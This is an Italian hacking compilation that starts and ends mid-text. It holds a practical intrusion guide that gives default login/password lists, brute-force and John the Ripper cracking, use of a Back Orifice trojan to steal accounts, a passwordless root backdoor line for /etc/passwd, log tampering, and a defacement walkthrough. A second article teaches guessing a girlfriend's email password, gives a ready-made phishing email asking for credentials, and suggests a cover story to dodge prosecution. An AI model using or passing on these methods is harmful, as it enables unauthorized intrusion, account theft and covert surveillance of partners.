chiama IP (Internet Protocol). Ora per scegliere in che modo entrare si usano le PORTE. Ogni programma usa 
una porta diversa per connettersi. Ecco le porte più comuni: 


Porta Utilizzo 


0 ping (solo via ICMP) 

21 ftp (File Transfer Protocol) 

23 telnet 

25 stmp (Simple Mail Transfer Protocol) 
79 finger 


80 http (Hyper Text Transfer Protocol 
110 pop3 (Post Office Protocol 3.x) 


Per connettersi a queste porte ci sono 3 modi: 

TCP: quello classico che usano tutti (Transfer Control Protocol) 

UDP: per spedire pacchetti e dati speciali (User Datagram Protocol) 

ICMP: per spedire pacchetti PING per testare la velocità tra due computer (Internet Control Message Protocol) 


Programmi utili: 


I programmi per win95/dos che probabilmente vi serviranno ad hackerare sono: 

Netinfo: per avere più informazioni possibili da un server 

GenerID: per generare identità false con codice fiscale per registrarvi nei provider 

John the Ripper: per decriptare i passwd file 

Back Orifice: per rubare le password degli account ad un altro per mezzo di un trojan horse 

UnSecure: programma per provare password su un dato login molto velocemente 

Qualche codice C per sniffare (spiegato dopo). 

Questi programmi sono disponibili alla mia home page http://members.xoom.com/Kalidor_hp/secret.html 
La password come trovarla è spiegato nella sezione "Come hackerare le password in javascript". 


Precauzioni: 


Quando hackerate c'è sempre una possibilità che vi scoprano e che dal vostro IP risalgano alla vostra identità. 
Perciò quando hackerate dovete SEMPRE usare un account per internet NON VOSTRO. Per ottenerlo ci sono 
due modi: 

1) Registrarsi ad un provider (telefonando) usando GenerID e dando i dati generati. Vi daranno un account 
provisorio di due settimane, da aggiornare ogni volta che scade con lo stesso metodo. Questo è il metodo più 
fastidioso perchè ogni 2 settimane bisogna telefonare. 

2) Rubare l'account a uno che sapete che internet non lo usa spesso. Per fare questo usate Back Orifice. Mandate 
il file boserve.exe alla vittima e con qualche scusa glielo fate eseguire. Poi lanciando BoGui e usandolo su di lui 
avrete accesso alle sue password di account. 

Ci sono anche dei programmi che vi danno una certa sicurezza in quanto a rintracciamento: gli spoofers che 
falsificano il nome del vostro pc e i jammer che non ho ancora capito cosa facciano e se funzionano ma sembra 
che vi diano ulteriore privacy. 


Ulteriori precauzioni vanno prese dentro il sito. Prima di tutto non bisogna cancellare o danneggiare nessun file, 
tranne quelli di log e passwd, altrimenti è più probabile che, nel caso veniate beccati, vi arrestino. Inoltre non 
hackerate mai questi tipi di server: 

.GOV (siti di governo MOLTO pericolosi in quanto a sicurezza) 

.MIL (siti militari ANCORA PIU' pericolosi) 

e qualsiasi server molto importante che amministra più di un milione di utenti internet. 


Parte pratica: 


Eccoci alla parte pratica. Qui imparerete a fare dei semplici hackeraggi. Spero che abbiate letto la parte teorica 
altrimenti qui non capirete un kakkio=). 


Come hackerare in Win95: 


In molte guide per gli hacker c'è scritto che se non hai linux o unix non puoi fare niente. Ciò non è assolutamente 
vero. Con win95 è possibile hackerare quasi facilmente come usando linux. Naturalmente avrete bisogno di 
alcuni programmi specifici e di qualche account per linux (detto shell account, spiegato dopo). L'unico problema 
di win95 sono i bug. Win95 è pieno di bug e ciò può impedire molto l'hacking; ad esempio su win95 non si può 
usare S.A.T.A.N. poichè i driver di rete sono programmati un po' alla cacchio e satan ha bisogno di driver veloci 
e programmati in modo da ottimizzare la connessione. Inoltre molti script per c possono essere lanciati solo da 
linux. A questo inconveniente si può rimediare agendo attraverso dei computer linux remoti, hackerati da voi. 
Comunque anche se in win95 tutto forse sarà un po' complicato non è mai impossibile, basta sapersi arrangiare. 


Entrare nei server: 


Questa è la prima e più difficile parte dell'hacking. Per entrare nei server bisogna prima di tutto avere più 
informazioni possibili su di esso. Quindi aprite netinfo o un prog simile e fate tutto quello che potete fare li. La 
funzione più importante in netinfo è il FINGER. Esso ti permette di vedere tutti i login connessi al server al 
momento e darvi informazioni sui login che non sono connessi. Per usarlo prima di tutto fingerate 
@server.da.hackare (potete anche farlo usando un prog per connettersi ad una porta specifica...andate sulla porta 
79 e scrivete invio per gli user online o il nome dello user che volete se è offline). Se vi dice che non può 
connettersi allora niente. Se invece vi da qualche login o vi dice "no one logged on" allora il server ha il finger 
attivato. Ora prendete nota dei login che vi da, se li da, e fingerateli singolarmente usando 
login@server.da.hackare. Vi darà informazioni più specifiche sui login in questione e forse anche altri login 
associati a quello che avete messo. Ora provate tutti i login che vi possono venire in mente e tutti quelli comuni 
(scritti dopo). Prendete sempre nota di questi login. Ora prendete nota di tutte le possibili password che avete 
ricavato con le altre funzioni del netinfo. 

Adesso create un collegamento sul desktop di c:\windows\ftp.exe e lanciatelo. Questo è uno dei due programmi 
che si usano per connettersi ai server. Questo si connette alla porta 21. L'altro programma si chiama telnet.exe e 
sta anche in c:\windows\. Create un collegamento sul desktop anche di quello. Ftp (File Transfer Protocol) è il 
programa per trasferire i file da un computer all'altro e telnet è il programma che emula il vero unix. Quando si 
hackera bisogna usare tutti e due i programmi perchè con uno provate i login (provare i login con ftp da meno 
probabilità di essere beccati) e trasferite i file e con l'altro leggete le mail e modificate i LOG e i passwd 
(spiegato dopo) e fate molte altre cose. Ora che avete lanciato ftp vi chiederà per il login. Prendete uno dei login 
che avete fregato, oppure se non ci siete riusciti provate uno che pensate possa essere quello, e provate ad 
associarlo ad una password (abbastanza spesso accade che il login sia uguale alla password). Provate a 
combinare login e password in tutti i modi possibili. Ci sono tre tecniche per indovinare login e password: 


*Login comuni: 


Quando si compra un server e un computer in cui è installato linux o unix vi danno dei login e password di 
default, da modificare in seguito. Alcuni sysop ingenui non cambiano i login e password e se siete fortunati 
riuscite ad entrare senza molta fatica. Ecco i login di default: 


LOGIN PASSWORD 

root root, system, sysop, nomesistema, nomepersona, none, vedi sys 
SyS sys, system, manager, nomedelsistema, vedi root 
daemon daemon, background, none 

UUCcp uucp, vedi guest 

tty tty 

test test 

unix unix, test 

bin bin, system, vedi root 

adm adm, admin, sys, vedi root 

admin adm, admin 

sysman sysman, syS, system 

sysadmin sysadmin, sys, system, admin, adm 
who who, none 

learn learn 

uuhost uuhost 

guest guest, user, anonymous, visitor, bbs, nomesistema / organizzazione 
host host 

nuucp nuucp, vedi uucp 

rje rje, none, vedi root 

games games, player 

sysop sysop 

demo demo, nomedelsistema, none 
visitor vedi guest 

anonymous vedi guest 

anon vedi guest 

user vedi guest 

nomedelsistema vedi guest 

student student, vedi guest 

ftp ftp, ftpuser, vedi guest 

ftpuser vedi ftp 

XXCp xenix 

system manager 

nobody nobody, none 

field service 

archie archie, none 

garchie garchie, none 

whois whois, none 

bbs nomedelsistema, bbs, waffle, none 
services nomedelsistema, services, none 
info nomedelsistema, info, none 

new nomedelsistema, new, none 
newuser nomedelsistema, newuser, none 
ingres none, ingres, nomedelsistema 

date date, none 

lpq lpq, none 


time time, none 


weather 


weather, forecast, none 


forcast vedi weather 

help help, none 

test nomedelsistema, test, none 
waffle vedi bbs 

trouble trouble, vedi root 

lp Ip, printer, print, vedi root 
unmountsys unmountsys, unmount, vedi root 
setup setup, vedi root 

makefsys makefsys, vedi root 

sysadm sysadm, sys, system, vedi sys-adm-root 
powerdown powerdown, vedi root 
mountfsys mountfsys, vedi root 

checkfsys checkfsys, vedi root 


*Password list: 


Se ancora non siete entrati potete provare la tecnica del password list / brute force. Questa tecnica consiste di 
prendere un login che vi sembra debole e di provare a usare UnSecure su di esso, prima usando una password 
list e poi usando il metodo brute force. La password list è inclusa con unsecure e se non vi va bene ne potete 
trovare in giro con una piccola ricerca. Questo è il metodo più pericoloso però perchè con un grande numero di 
tentativi sullo stesso login c'è un alto rischio di essere beccati (sono sicuro che state usando il vostro account 
FALSO;-). 


*Backdoors: 


Le backdoor sono dei login speciali che un sysop (o un hacker, spiegato dopo) mette per far avere accesso a 
delle persone che non devono avere ufficialmente accesso al server oppure per avere un login di salvataggio con 
permission elevata nel caso si dimenticassero la password del root o in casi di emergenza. Se conoscete una 
persona che ha una backdoor nel server oppure avete preso una backdoor con il finger cercate di conoscere il 
più possibile su questa persona e cercate di scoprire la password. Provate anche il metodo delle password list su 
questo login qui. 


Ricordate che entrare nel server è la parte più lunga e difficile quindi provate e riprovate e non scoraggiatevi, 
nessun server è inattaccabile. 


Come avere l'accesso ROOT: 


Bene qua siamo alla parte più importante dell'hacking. Avere l'accesso di ROOT. Prima di tutto andate a leggere 
il passwd file e vedete se il root è criptato o shadowato. Se è criptato usate john the ripper su tutti i login criptati 
e vedete quello che ne cavate fuori. Avrete ottenuto un paio di login. Se avete preso il root saltate con gioia per 
tutta la stanza. Se no provate a usare i nuovi login che avete fregato e vedete se riuscite a prendere informazioni 
sul login root. Ricordatevi che le password possono essere nascoste in ogni angolo del server tra le directory più 
anonime e insignificanti. Se ancora non avete preso il root allora mettetevi li con "john -i passwd" (vedi il 
manuale di john the ripper) e state li a crakkare per un paio di settimane e continuate a cercare bene nel server. 
Qualcosa troverete. Un'altro modo di trovare l'accesso di root è usando sniffer o exploits vari. Come usarli e 
quali sono è spiegato nella parte avanzata. 


Come mantenere l'accesso al server: 


Questa sezione, anche se non sembra, è molto importante dato che gli hackers principianti si fanno sgamare 
come novellini perdendo l'accesso root al server dopo un cambio di password. Mantenere l'accesso oltretutto è 
molto semplice. Ci sono tre cose da fare sempre. 
Crearsi una Backdoor. Quando si ottiene il root bisogna entrarci una volta sola altrimenti il sysop si potrebbe 
insospettire. Quindi quando si entra bisogna assolutamente crearsi una backdoor. Per far questo si edita il 
passwd file e si aggiunge NEL MEZZO del passwd (dico nel mezzo visto che così è meno probabile che il 
sysop se ne accorga) una stringa di questo genere: "kalidor::0:KALIDOR:/usr/local:/bin/bash". In questo 
modo la prossima volta che entrate al login scriverete kalidor e come pass non metterete niente 
Lanciare uno sniffer in background (come farlo spiegato dopo). In questo modo se cambiano la password di 
root potrete riprenderla per mezzo del log dello sniffer. 
Modificare sempre tutti i file di log in modo da non lasciare nessuna vostra traccia nel server. Come 
modificare i file LOG è spiegato dopo (no giuro ogni volta che dico "spiegato dopo" vuol dire che è 
DAVVERO spiegato dopo...tranquilli=) 


Come hackerare le password in javascript: 


Questo è l'hack più facile che io abbia mai fatto. Un esempio di password per javascript lo potete trovare alla mia 
home page (http://members.xoom.com/Kalidor_hp/secret.html) la cui password non la dico per non togliervi il 
piacere di trovarla=). Ci sono due tipi di password che potete trovare in un sito: 


Le password assegnate alle directory con un cgi-bin che sono quindi hackabili solo hackerando interamente 
il server 
Le password assegnate agli html con un codice javascript 


Per hackerare queste ultime bisogna disporre di un programma capace di scaricare sull'hard-disk i file .htm / 
.html senza prima accedervi. Io consiglio GETRIGHT. Quindi andate alla mia home page, fate tasto destro su 
ENTER e fate copia collegamento. Ora scaricate il collegamento copiato con getright (per leggerlo fate ctrl-v, 
per copiarne uno usate ctrl-c). Ora che avete scaricato il file apritelo con il blocco note e leggete il codice html. 
Leggendo bene, anche se non conoscete l'html, troverete la password. Se per entrare nel sito con la password c'è 
un pulsante allora per sapere il link leggete l'html locale e poi eventualmente quello di destinazione. Ci sono dei 
casi in cui la password è scritta nell'html della pagina di partenza e in quel caso basta leggere l'html locale. 


Parte avanzata: 


Bene eccoci alla parte avanzata. Qua (almeno per me quando ho iniziato=) le cose diventano un po' più difficili. 
Questa parte è fatta per affinare le vostre tecniche di hacking e per permettervi di crearvi un vostro stile; 
ricordatevi che l'hacking è un'arte, se fatto bene, e non dev'essere trattato come uno strumento per fare il figo in 
mezza internet altrimenti non sarete più hacker ma la gente vi chiamerà lamer. Bene dopo una piccola cazziata 
cominciamo con la parte avanzata=). 


Shell account: 


La shell account è l'account di internet per quelli che usano linux. Da una shell account si possono eseguire i 
comandi principali del linux e fare alcune cose. Oltre alla shell account vi servirà un server dove potrete 
installarvi dei programmi dentro come S.A.T.A.N., che potete usare solamente con linux. Se agite attraverso 
questo server (usando telnet) e attraverso la shell account sarete molto avvantaggiati durante i vostri hackeraggi. 
Procurarsi una shell account è abbastanza semplice. Ci sono vari modi: 


Controllare se il vostro provider vi ha già dato una shell account. Per fare questo prendete l'ultima parte della 
vostra email (ad esempio lamer@iol.it prendete iol.it) e connettetevi con telnet a quel server. Usate il vostro 
login e password per connettervi. Se siete fortunati avete una shell account. Un'altro modo è di connettersi al 
vostro provider con hyper terminal che si trova in avvio - programmi - accessori - hyperterminal. 


Connettetevi al numero che usate per connettervi e usate sempre il vostro login e pass. Se vi da un prompt 
tipo unix allora avete una shell account. Altrimenti potete chiedere all'assistenza tecnica del vostro provider 
se ne avete già una 
Comprarvi una shell account. La potete richiedere in molti provider piccoli. Non chiedetela a quelli grossi 
perchè la shell account è lo strumento più utilizzato dagli hacker e quelli, per paura degli hacker, non ve la 
daranno di certo 
Hackerare una shell account. Questo è relativamente semplice, basta beccare un provider e hackerarlo. Spero 
che sappiate già come fare;-) 
Farvi dare una shell account da un altro hacker 
Per trovare invece un server decente dove potete installare programmi grossi basta beccare un sito internet un po' 
piccolino (non troppo se no non hackerate un server ma una schifezza) e hackerarlo. 


Exploits: 


Gli exploits sono dei programmi eseguibili o compilabili scritti in C (spiego dopo..) che aiutano l'hacker ad 
entrare nel server, ad avere il root o a non essere beccato. Questi file alcune volte sono indispensabili durante un 
hackeraggio quando il server è molto ben protetto e non riuscite ad hackerarlo con le tecniche tradizionali. Gli 
script C e gli exploit devono essere sempre lanciati o da una shell account o dal root di un server o dal sito da 
hackerare. Ci sono moltissimi tipi di script C ed exploit ma i più comuni sono gli sniffer. Gli sniffer sono 
generalmente degli script che, se lanciati dal sito da hackerare, registrano su un file di log nascosto tutti i login e 
password di quelli che entrano nel server. Gli sniffer li potete trovare di vari tipi con una piccola ricerca su 
internet. Per compilare gli script prima si mettono sul server via ftp con il comando PUT e poi si compilano con 
telnet con il comando cc. Certe volte però i siti dove compilate questi script non hanno tutte le librerie necessarie 
(per vedere quali librerie servono guardare nel C quali "#include libreria.h" ci sono). In questo caso dovrete 
mettere voi stessi le librerie necessarie nel server scaricando quelle di un altro sito (con ftp comando GET) 
oppure compilando lo script su una shell account per C e poi uploadare il file eseguibile sul sito da hackerare e 
lanciarlo in background. 


Denial of service: 


I programmi denial of service (dos) sono quei programmi che, come dice il nome, negano un dato servizio 
all'utente. Si usano soprattutto durante le guerre tra hackers e crackers e certe volte danneggiano anche molte 
altre persone oltre a quelli che combattono. E' molto pericoloso usare questi programmi su dei server poichè essi 
potrebbero non gradire, loggarvi e denunciarvi al vostro provider quindi usateli con cautela. Questi sono i tipi di 
dos più comuni. 


*Nuke: 


I nukers sono dei programmi che sfruttano una vecchia bug di win95 e connettendosi alla porta 139 di un 
computer windows lo fanno crashare. Questi programmi non funzionano su win98, su win95 con la patch 
vtcpupd e su win95 con un antinuke installato. 


*Flood: 


I flooders sono programmi che sfruttano il PING, cioè un sistema per controllare la velocità tra due server 
usando la porta 0 ICMP. Quando si pinga si manda un pacchetto (un piccolo pezzo di dati) e si calcola il tempo 
che si impiega a riceverlo. Il flood manda enormi pacchetti di ping a grande velocità rallentando la connessione 
della vittima. 


*Mailbomb: 


I mailbomber sono dei programmi che usano tanti server per inviare mail e inviano centinaia o migliaia di mail 
uguali ad un indirizzo email. Questi programmi possono anche danneggiare i server utilizzati poichè li rallentano 
molto e riempiono i loro file di log e certe volte un server o due può crashare. 


*Vari: 
Ci sono molti altri tipi di dos. Alcuni di questi sono: 


ICQbomb 
IRCkill 
PowWowflood 
Ssping 

Jolt 
IceNuke 
Bouncer 
Pepsi 

UDP flood 
Suffer 
Land 
Teardrop 
Bonk 
Boink 
NesTea 
Smurf 
PortFuck 


Potete trovare informazioni su questi dos con qualche ricerca su internet. 
Trucchetti vari: 


Questi sono alcuni trucchetti che conosco. Sono pochi ma ne aggiungerò degli altri. Di solito funzionano su 
sistemi vecchi o deboli quindi non vi assicuro niente. 


Provate il trucchetto del "quote". Connettetevi via ftp al server da hackerare. Quando vi chiede login e pass 
premete sempre invio. Poi scrivete: 


> quote user ftp 
User OK send password. 
>quote cwd *root 


>quote pass ftp 


Avrete il root 
Provate il trucchetto del frontpage. Se nel sistema è installato frontpage prendete il .pwd nella directory del 
fp. Conterrà la password criptata in DES (se quella del root è shadowata può servire) 


File di LOG: 


I file di log sono i file dove vengono registrati alcune o tutte le attività nel server. I file di log che interessano 
agli hacker sono quelli dove vengono registrati i login falliti, upload di file e log che potrebbero far scoprire al 
sysop la vostra presenza. 

I file di log più comuni sono: 


/usr/adm/sulog o /usr/adm/su_log 
/usr/adm/loginlog o /usr/adm/acct/loginlog 
/usr/adm/errlog 

/usr/adm/culog 


Ricordate di EDITARE questi file NON di cancellarli. 
S.A.T.A.N.: 


Il S.A.T.A.N. (Security Administration Tool for Analyzing Networks) è un programma che gira sotto unix con 
perl 5 che scannerizza un network cercando di trovare delle falle e dei bug. E' provvisto di un grosso manuale in 
html quindi non perdo tempo a spiegarvi come si usa. Bisogna usare una shell account o un server per lanciarlo e 
richiede una buona velocità di connessione. Per controllare se un server è stato attaccato dal SATAN si possono 
usare due programmi, il gabriel e il courtney. In teoria questo programma servirebbe a controllare la propria rete e 
a correggere le aperture che il satan trova. Ma sono sicuro che troverete un altro modo d'uso per questo simpatico 
prog=). Per trovarlo basta fare una piccola ricerca, di solito il file che lo contiene si chiama satan-1.1.1.tar.Z. 


Port surfing: 


Il port surfing è una tecnica di penetrazione dei sistemi. Consiste nel fare un portscan (spiego dopo) ad un server 
e di provare ad acquisire più informazioni possibili da ogni porta che risulta aperta. Il portscanner si può trovare 
sempre con una piccola ricerca, il mio portscanner preferito è il 7th Sphere Portscan, molto veloce. Il portscanner 
si connette a tutte le porte una ad una dalla porta 0 alla 65536 e ti avverte quando una porta è aperta. In questo 
modo tu puoi sapere tutte le porte aperte ed eventualmente segrete in un server e connetterti cercando 
informazioni. Ad esempio mi è capitato una volta che stavo facendo un portscan su un server e ho trovato una 
porta aperta con valore molto elevato, intorno a 30000. Mi sono connesso a quella porta (con telnet specificando 
il numero quando fai connetti - sistema remoto) e ho provato a scrivere le cose più comuni, tipo HELP, HELO, 
HELLO, LOGIN. Ho provato root e puf mi ha dato la password. Schifo di server eh? Non vi assicuro che succeda 
anche a voi cmq. Questo è stato un colpo di fortuna. 


Tutorial: 

Eccoci alla parte che tutti aspettavate. Il TUTORIAL. Per quelli che non sanno cos'è, il tutorial è una specie di 
lezione "guidata". In questo caso è un hackeraggio guidato. Naturalmente userò un server inesistente perchè il 
vostro primo hack dovrete farlo VOI. Cominciamo: 

Sono su irc, un amico hacker comincia a rompere che la sua home page è troppo figa etc. Mi viene un'idea di 
fargli uno scherzetto e visito la sua pagina. Carina sì...facciamo sto scherzo=). Sarebbe bello rinominare 
index.html in index2.html e metterci un nuovo index.html con scritto "QUESTA PAGINA E'STATA 
HACKERATA DA KALIDOR - CLICCA QUI PER ENTRARE" o qualcosa di simile. Beh vediamo l'url: 


http://www.sardine.com/scatola/index.html 


Vediamo un po se esiste sardine.com. Faccio il ping...l'host non esiste. Vuol dire che devo hackerare 
www.sardine.com. Fingeriamo... 


No one connected now. 
Vuol dire che non c'è nessuno. Beh proviamo a fingerare sardine. 


Login = Name TIY Idle When Where 


sardine SardineWEB  pts/18  <Sep 117:30> maiden 


Bene c'è. Facciamo un po di whois...niente whois. Portscan...porte normali, le solite 21, 23, 25, 79, 80, 110. Ok 
apriamo ftp. 


>Open 
(to)www.sardine.com 


Connected to www.sardine.com. Ftp version 2.0 on www.sardine.com. 
Login: 


Mah proviamo sardine no? 


Login: sardine 
Password: 


Beh..proviamoooo....... "sardine"! =) 
Password: 
(Naturalmente non si vede ma li ho scritto sardine). 


Login incorrect. Login failed. 
> 


Azzo. Sbagliato. Beh proviamo il trucco del quote. 


>quote user ftp 

User name OK send password. 
>quote cwd *root 

Please login with USER and PASS 


Ok se dice quello il trucco non funziona. Hmm...proviamo maiden...c'era scritto nel finger. 


>user sardine 
User name OK send password. 
Password: 
User sardine logged in. Last login <Sep 117:30>. 
> 


MITICO! SONO ENTRATO. Ora chessifa? 


>pwd 

Current directory is / 

>cd etc 

>get passwd 

Open ASCII mode data connection for /bin/ls 

Tranfer complete. Recieved 9345 bytes in 2.3 seconds. 
> 


Ok vediamo un po sto passwd file. Apro... AZZ CI SONO 150 LOGIN TUTTI CRIPTATI DES!!! E ANCHE IL 
ROOT E' CRIPTATO DES. MITICO!!! 


>bye 
Goodbye. 


Ok prendiamo John The Ripper. Proviamo tutto. 


john -single passwd 

john -wordlist password.txt -rules passwd 
john -i:alpha passwd 

john -i:digits passwd 

john -i passwd 


A questo punto abbiamo 138 login..così dice il john...vediamo un po. Quello che all'inizio ci interessava, scatola 
non l'abbiamo..vabbè. Cerchiamo un po root...il codice è Ko./GkA9YUfFA ... ROOT! ECCOLO! 


Ko./GkA9YUfFA:alskdjfh 


A noi! Connettiamoci con telnet...editiamo il password file e aggiungiamo una backdoor...ci togliamo dai log 
file...unshadowiamo i login che erano shadowati... 

Ora possiamo giocherellare con la pagina del mio amico e in più abbiamo un bel server tutto nostro..slurp. 
Ricordiamoci però di non modificare niente altro...e ricordiamoci che il sito del tizio che hackeriamo è di uno che 
sa stare agli scherzi...cioè non dirà a quelli del provider che la sua pagina è stata hackerata. Se no vi 
beccano...capito? 


Conclusione: 


La guida è finita. Sigh. Vabbè cmq se l'avete letta tutta vi aspettano molte giornate & nottate divertenti di 
hackeraggi...capirete ben presto quanto sia bello e imparerete moltissime cose. Magari scriverete anche voi una 
guida ancora migliore della mia...non si sa mai=). Spero che vi sia piaciuta e gradirei molto qualche 
mail..kalidor@tin.it. Se sono mailbomb o flames mandateli a dev/null@tin.it (dev/null è il posto dove vengono 
conservati gli archivi vecchi destinati a perdersi nel tempo). Contattatemi anche con ICQ il mio uin è 7874185. 
Mi trovate a chattare su kali in Tin Kali Server con il nickname KalidorvHCK-NWB e su IRC con il nick 
Kalidor e lo spoof su “KaLiDoR* (vi spiegherò un giorno o l'altro cos'è lo spoof). 

Ricordatevi di visitare la mia homepage a http://kalidor.tsx.org 

Lì troverete tutto ciò di cui avrete bisogno. Grazie di aver letto la mia guida e HAPPY HACKING!!!! HACK 


Come rubare le password... Senza fare niente di illegale ;-) 
Autore: Screener_it 
email: screener_it@freemail.it 
web site: http://go.to/tankcommandos 
colonna sonora: Californication - Red Hot Chili Peppers 


Premetto che questo articolo per molti potrà sembrare di stampo lamer.. 
E onestamente a me di questi altri non me ne frega un cazzo !!!! 


TAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVA) 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
++++++++++++ 

\VAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVAVI 


Allora.. Ora veniamo a un giochino molto, ma molto, anzi MOLTO divertente.. 
Rubare password senza dover usare programmi particolari, exploit, et simili.. 
Niente. Basandoci unicamente sulla nostra fortuna.. E' possibile ? CERTO CHE 


articolo della minchia). 

Mettiamo subito in chiaro che quanto detto in questo articolo non è teorico, 
ma è provato e dimostrato scientificamente... 

Allora, cominciamo... 

Quando dobbiamo fare una casella email, fare un abbonamento a internet, 
aprire un sito presso xoom, tripod, ecc.., nel 99 % dei casi dobbiamo 
scegliere noi la password... L'utente medio di computer è piuttosto 
rincoglionito e quando deve scegliere una password sceglie qualcosa 

di facile da ricordare.. Altrimenti come farebbe se dovesse dimenticarsi 

la password ? Dovrebbe rifare l'abbonamento a internet, non potrebbe più 
aprire la sua casella mail.. 

Per questo l'utente medio sceglie password BREVI E MOLTO SEMPLICI. 
Facendo un breve schema dell'utente potete scoprire la sua password.. 
Esempio. 

La vostra ragazza ha una casella email tipo roberta@yahoo.it (email a 
caso, non so se esiste). 

Allora, fatevi un bello schema, tipo questo. 


Nome: Roberta 

Cognome: Verdi 

Data di nascita: 04/05/76 
Residenza: Gallarate 

Nata a: Milano 

colore capelli: marron 

colore occhi: azzurri 
soprannomi: roby, Rob, ecc.. 
fidanzati: Andrea, Marco, ecc.. 


Andate alla pagina http://mail.yahoo.it , nel nome utente scrivete roberta 
(il nome utente di una casella email è nel 99,9 % è la parte prima dell' @..) 
e cominciate a provare le password.. roberta, roberta76, robverdi, verdi, 
verdi76, verdiroberta, robertaverdì, ecc... 

Provate varie combinazioni e a meno che l'utente non sia un genio la 
troverete entro 15 minuti.. 


Altro esempio: 

Mettiamo caso che io vogli rubare la password di un sito di xoom.com ... 
Mettiamo esempio che il sito abbia indirizzo http://members.xoom.com/andrea/ 
(sito a caso, non so nemmeno se esiste.. 

Visitiamo il sito.. Di sicuro il webmaster non avrà resistito alla tentazione 


di mettere una pagina dedicata a lui, con il suo nome, i suoi hobby, la sua 
età, magari la sua foto.. 

Guardiamo la foto del poveretto che stiamo per colpire e prendiamo carta e 
penna... 

Dal sito prendiamo le informazioni su di lui (come abbiamo fatto su Roberta): 


Nome: Andrea 

Cognome: Rossi 

Data di nascita: 04/05/76 

Residenza: Latina 

Nata a: Roma 

colore capelli: marron 

colore occhi: azzurri 

soprannomi: andry, ecc.. 

squadra del cuore: Lazio, Roma, ecc... 

giocatore preferito: Nedved (mitico !!), Totti, ecc.. 


Prendiamo il nostro bel FTP, 

indirizzo: ftp.xoom.com 

nome utente: andrea (dall'indirizzo http://members.xoom.com/andrea/, il nome 
utente è la parte non standard.. Es. members.tripod.com/ciao/ nome utente: 
ciao, http://utenti.tripod.it/marco nome utente: marco). 

Password: andrea, rossi, andrearossi, rossiandrea, andrea76, rossi76, nedved, 
totti, ecc.. 

Nel giro di altri 15 minuti se il webmaster è scemo (meglio: rientra nella 

media) avrete trovato la password... 


Un consiglio: fatelo solo se avete un motivo, se volete controllare la posta 
della vostra ragazza (per sapere cosa pensa di voi), se una pagina internet 
vi ha scandalizzato o và contro i vostri principi morali... Non fatelo per 

il gusto di farvi vedere, altrimenti sarete etichettati come lamer (ma in 

fin conti.. Ce ne frega di cosa pensano gli altri di noi o di cosa pensiamo 
noi ?). 

Un ultima cosa: in genere io dopo che ho scoperto una password e mi sono 
divertito un po' comunico a chi ho fregato la password che la sua pass è 
troppo semplice e gli conviene cambiarla... Un po' di correttezza ragazzi !! 


Un ultima cosa... Questo articolo diceva: rubare le pass senza fare nulla 

di illegale.. Ma trovare la password, anche sparando a caso, è sempre 
reato... E allora ? 

Dovete avere l'accortezza di crearvi un sito web o una casella mail simile 

a quella di cui volete rubare la pass.. 

Se avete una casella come robertal@yahoo.it potete sempre dire di essere 
entrati per sbaglio nella casella roberta@yahoo.it (che guarda caso ha la 
stessa password..). Stessa cosa per il sito web.. Se volete entrare in un 
sito tipo members.xoom.com/andrea fatevi un sito tipo members.xoom.it/andrea 
oppure members.xoom.com/andreaa. Capito ? 

Così diventa TUTTO legale.. Dovete solo ricordarvi di dire che vi siete 
sbagliati. 


Sempre avanti ragazzi !!!! Non saranno l'FBI, la CIA, o la MICROSOFT a 
fermarci,(ma la guardia di finanza :-) 


ARSA SA EE ARES PDS DEAN SINFINFAIA 
EM MEMI I AIMM PIEMONTE 


C'è un altro modo che funziona, ma è già più difficile che qualcuno ci 
caschi..Cmq molti ci cascano, parola di Screener_it.. 


Basta che vi creiate una casella email che faccia sembrare che siate 
responsabili di xoom, tripod, yahoo o altro tipo: 

xoom@technologist.com ; yahoo@programmamer.com ; libero@usa.net ; ecc.. 
Scrivete una mail alla vostra vittima dicendo che ci sono problemi con 

la sua email o con il suo sito e che deve darvi la sua password. 

Esempio: 


"Buongiorno caro utente, 

ultimamente, come forse ti sarai accorto, il nostro servizio è diventato 
più lento, a causa dei lavori di aggiornamento di tutto il nostro software. 
Proprio a causa del cambio software dobbiamo inserire tutti i dati nei 
nuovi programmi e ci serve anche il tuo aiuto. 

Rispondi a questa mail scrivendo nell'oggetto "Conferma account" e 
mettendo nel corpo della lettera il tuo ID e sotto la password. Il 
computer ti aggiungerà in modo automatico all'elenco dei dati. 

Se non farai questo entro 1 settimana è possibile che il computer cancelli 
il tuo sito (o la casella email.. A seconda di che password volete fregare) 
e tutto il tuo lavoro.. Quindi affrettati !!! 


Lo staff di xoom (0 Tripod, o yahoo, ecc..)" 


Ora, voi direte: ma chi vuoi che sia così scemo da spedire le password 
via email ? Tanti !! Tanto per farvi un esempio un po' di tempo fa mi è 
arrivata l'email di un certo infostrada-clienti@iname.com che invitava 
a spedire una copia della sua email, inserendo l'indirizzo 
infostrada-clienti@iname.com tra i destinatari. In questo modo 
infostrada-clienti@iname.com si è ritrovato con centinaia di indirizzi 
email, da usare per fare spam e altro !!! E tanti ci sono cascati e 
mandavano in giro 'sta mail. 

AI che io mi sono incazzato (gli spammer mi stanno proprio sulle palle) 
e ho denunciato infostrada-clienti@iname.com presso la vera Infostrada. 
Chissà perchè ma non l'ho più sentito.. 


Screener_it 


1) Basi dell’Ip Spoofing e del Hijacking ( by 
InfectedMachine ) 


L’ip spoofing e’ una tecnica mediante la quale si riesce 
ad ottenere un accesso con pieni privilegi ( SuperUser 
level o root ) ad un terminale modificando la serie di 
pacchetti di informazioni ip che partono ed arrivano da 
un computer al momento della connessione. 


L’ip spoofing e’ possibile quando i pacchetti di 
informazioni viaggiano sullo stesso network e non 
escono mai all’esterno ( anche se vi sono alcune 
eccezioni ). 


Un collegamento base ( telnet, web, ftp, ecc. ) tra due 
computer collegati ad internet funziona tramite lo 
scambio di pacchetti di informazioni IP che 
confermano la provenienza e la destinazione di un 
terminale. Un ipotetico computer A manda un 
messaggio SYN ( SYnchronize sequence Number ) e 
una serie iniziale di numeri, chiamata ISNa, al server B 
richiedendo il collegamento alla rsh ( remote shell ) o a 
qualche altro servizio remoto ( tanto per citarne uno, 
rlogin porta TCP 513 ). Il server B risponde ad A con 
un pacchetto di informazioni SYN, ISNb ( l’Initial 
Sequence Number di B ) e un ACK ( ACKnowledge ) 
che contiene l’ISNa aumentato di 1 per poter cosi’ 
